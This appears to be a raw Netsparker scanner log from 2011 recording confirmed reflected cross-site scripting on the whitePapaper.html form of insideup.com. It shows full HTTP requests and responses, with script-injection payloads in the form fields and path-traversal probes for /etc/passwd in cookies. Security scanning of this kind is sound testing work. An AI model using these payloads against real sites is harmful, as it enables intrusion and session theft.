OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011AF)%3c%2fscript%3e&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:36 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=43AACFE9AC0B13771A3F8892F16E92E5; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="'"--></style></script><script>netsparker(0x0011AF)</script>"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST '"--></style></script><script>alert(0x0011BB)</script>
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011BB)%3c%2fscript%3e&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=CDFE7220E5554E69E07D8786694C541F; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="'"--></style></script><script>netsparker(0x0011BB)</script>"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST '"--></style></script><script>alert(0x0011CA)</script>
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
